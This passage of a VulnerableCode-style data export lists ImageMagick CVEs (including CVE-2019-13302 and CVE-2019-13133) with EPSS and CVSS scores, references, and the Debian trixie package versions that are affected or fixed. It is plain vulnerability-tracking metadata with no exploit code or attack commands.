published_at	2026-04-09T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68665
published_at	2026-04-11T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68652
published_at	2026-04-21T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68662
published_at	2026-04-16T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68673
published_at	2026-04-18T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68701
published_at	2026-04-24T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68706
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2018-6930

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1544789
reference_id	1544789
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1544789

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2018-6930

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m2q5-rtqv-tudu

url VCID-m4we-6udg-p7cj

vulnerability_id VCID-m4we-6udg-p7cj

summary ImageMagick: heap-based buffer over-read in MagickCore/fourier.c in ComplexImages

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13302.json

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13302.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13302

reference_id

reference_type

scores

value	0.0043
scoring_system	epss
scoring_elements	0.62604
published_at	2026-04-26T12:55:00Z

value	0.0043
scoring_system	epss
scoring_elements	0.62578
published_at	2026-04-21T12:55:00Z

value	0.0043
scoring_system	epss
scoring_elements	0.62589
published_at	2026-04-24T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63084
published_at	2026-04-02T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63078
published_at	2026-04-07T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.6313
published_at	2026-04-08T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63147
published_at	2026-04-09T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63165
published_at	2026-04-11T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.6315
published_at	2026-04-12T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63127
published_at	2026-04-13T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63162
published_at	2026-04-16T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63169
published_at	2026-04-18T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63025
published_at	2026-04-01T12:55:00Z

value	0.00439
scoring_system	epss
scoring_elements	0.63113
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13302

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1730571
reference_id	1730571
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1730571

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13302

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m4we-6udg-p7cj

url VCID-mcef-v74u-pke3

vulnerability_id VCID-mcef-v74u-pke3

summary ImageMagick: a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13133.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13133.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-13133

reference_id

reference_type

scores

value	0.00095
scoring_system	epss
scoring_elements	0.26218
published_at	2026-04-26T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26358
published_at	2026-04-16T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26331
published_at	2026-04-18T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26294
published_at	2026-04-21T12:55:00Z

value	0.00095
scoring_system	epss
scoring_elements	0.26225
published_at	2026-04-24T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26666
published_at	2026-04-07T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26784
published_at	2026-04-09T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26788
published_at	2026-04-11T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26744
published_at	2026-04-12T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26687
published_at	2026-04-13T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26796
published_at	2026-04-01T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26734
published_at	2026-04-08T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.26839
published_at	2026-04-02T12:55:00Z

value	0.00097
scoring_system	epss
scoring_elements	0.2688
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-13133

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1726078
reference_id	1726078
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1726078

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-13133

risk_score 1.5

exploitability 0.5

weighted_severity 3.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mcef-v74u-pke3

url VCID-p31j-f9s2-quh9

vulnerability_id VCID-p31j-f9s2-quh9

summary ImageMagick: use-after-free, heap-buffer-overflow triggered by GetPixelRed, GetPixelBlue in MagickCore/pixel-accessor.h

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25663.json

reference_id

reference_type

scores

value	4.7
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25663.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2020-25663

reference_id

reference_type

scores

value	0.0017
scoring_system	epss
scoring_elements	0.38135
published_at	2026-04-01T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38279
published_at	2026-04-02T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38302
published_at	2026-04-04T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.3817
published_at	2026-04-07T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38221
published_at	2026-04-08T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38229
published_at	2026-04-09T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38248
published_at	2026-04-11T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38212
published_at	2026-04-12T12:55:00Z

value	0.0017
scoring_system	epss
scoring_elements	0.38188
published_at	2026-04-13T12:55:00Z

value	0.00327
scoring_system	epss
scoring_elements	0.55713
published_at	2026-04-16T12:55:00Z

value	0.00327
scoring_system	epss
scoring_elements	0.55717
published_at	2026-04-18T12:55:00Z

